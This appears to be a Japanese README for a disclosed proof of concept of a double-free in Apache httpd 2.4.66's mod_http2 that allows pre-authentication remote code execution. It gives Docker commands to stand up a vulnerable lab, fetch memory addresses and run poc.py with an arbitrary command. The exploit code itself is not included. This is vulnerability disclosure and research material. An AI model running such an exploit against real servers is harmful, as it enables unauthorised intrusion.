
Apache httpd の mod_http2 ストリームクリーンアップにおける二重解放は、pre-auth RCE につながります。
Apache httpd の mod_http2 ストリームクリーンアップにおける double-free により、認証前の RCE が可能になります。
影響を受けるバージョン: mod_http2 とマルチスレッド MPM (event/worker) を使用する httpd 2.4.66。 修正版: 2.4.67。
発見・報告者: Bartlomiej Dmitruk (striga.ai) および Stanislaw Strzalkowski (isec.pl)。
詳細解説: https://striga.ai/research/apache-httpd-mod-http2-double-free
脆弱な環境をビルドして起動します:
docker build -t httpd-poc .
docker run -d --name httpd-poc --privileged -p 9443:443 httpd-poc
system() と scoreboard のアドレスを取得します:
docker exec httpd-poc python3 /getaddr.py 1
エクスプロイトを実行します:
python3 poc.py --host localhost --port 9443 \
--cmd 'date >> /tmp/win' --workers 64 \
--system <system_addr> --scoreboard <scoreboard_addr>
確認します (実行は確率的で、数分から数時間かかる場合があります):
docker exec httpd-poc cat /tmp/win
docker rm -f httpd-poc